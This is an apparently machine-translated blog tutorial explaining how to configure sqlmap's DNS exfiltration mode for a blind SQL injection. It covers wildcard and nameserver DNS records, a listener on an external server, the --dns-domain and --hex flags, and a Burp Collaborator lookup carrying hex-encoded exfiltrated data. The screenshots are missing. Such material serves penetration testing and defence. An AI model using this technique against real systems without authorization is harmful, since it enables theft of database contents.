Home > Operation and Maintenance > Safety > What is the sqlmap _dns injection configuration method?

What is the sqlmap _dns injection configuration method?

WBOY
Release: 2023-05-12 12:25:06
forward
1426 people have browsed it

There are too few articles on dns injection for sqlmap on the Internet. They only briefly introduce the --dns-domain parameter. The relevant practical articles are either vague or mentioned in one stroke, which is confusing (mainly dishes, The key is not brought by the boss yet). Then I did it again by referring to the methods on the Internet.

Things that need to be prepared are one sqlmap, windows blind injection, two domain names, and an external network server.

sqlmap _dns注入配置方法是什么

#One time when I was doing something, I came across a time blind injection. It happened to be a Windows machine, and I remembered the method of dns injection.

sqlmap _dns注入配置方法是什么

Before I start, I plan to use the --sql-shell command of sqlmap to test the dns injection payload

sqlmap _dns注入配置方法是什么

First go to the collaborator client in burpsuite and copy the domain name arranged by burp for us

Using sqlmap to execute the sql statement

sqlmap _dns注入配置方法是什么

Sqlmap is still running The request has been received in burpsuite.

sqlmap _dns注入配置方法是什么

##352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.

352E362E3134 is the result returned after executing version().

sqlmap _dns注入配置方法是什么

Decode to obtain the version of mysql. Well, there is nothing wrong with dns injection at this point.

Prepare to configure two domain names. Some articles on the Internet say that one is fine, but it always feels more troublesome. Many domain name server providers do not provide certain advanced functions, so it is easier to prepare two.

www.a.com

www.b.com

First we configure the domain name a-> a.com

sqlmap _dns注入配置方法是什么

You only need to add * to perform pan-analysis and point to the IP of our external network server.

Now let’s configure our domain name b->b.com

sqlmap _dns注入配置方法是什么

This is even simpler. Just modify the dns of the domain name directly and fill in ns1 .a.com ns2.a.com is enough. There is no need to do anything else, just fill it in.

Then wait for the domain name to take effect. We go to the external network server to test whether the parsing is successful

sqlmap _dns注入配置方法是什么

The server starts listening to port 53

sqlmap _dns注入配置方法是什么

Then The local computer pings hello.b.com and sends it to the external server. We have been able to receive the request from hello.b.com, and the local computer prompts that the host cannot be found and does not need to be ignored because we have not set up parsing. Now that everything is configured, we can use sqlmap for dns injection.

sqlmap _dns注入配置方法是什么

Add the parameter --dns-domain=b.com --hex to Sqlmap and you can

sqlmap _dns注入配置方法是什么

to At this step, sqlmap will get stuck and prompt to set up the DNS server instance

Direct ctrl c

sqlmap _dns注入配置方法是什么

prompts that the data retrieval through the DNS channel is successful.

The injection speed is as fast as error reporting and union, so you no longer have to endure the slow speed.

The above is the detailed content of What is the sqlmap _dns injection configuration method?. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:yisu.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template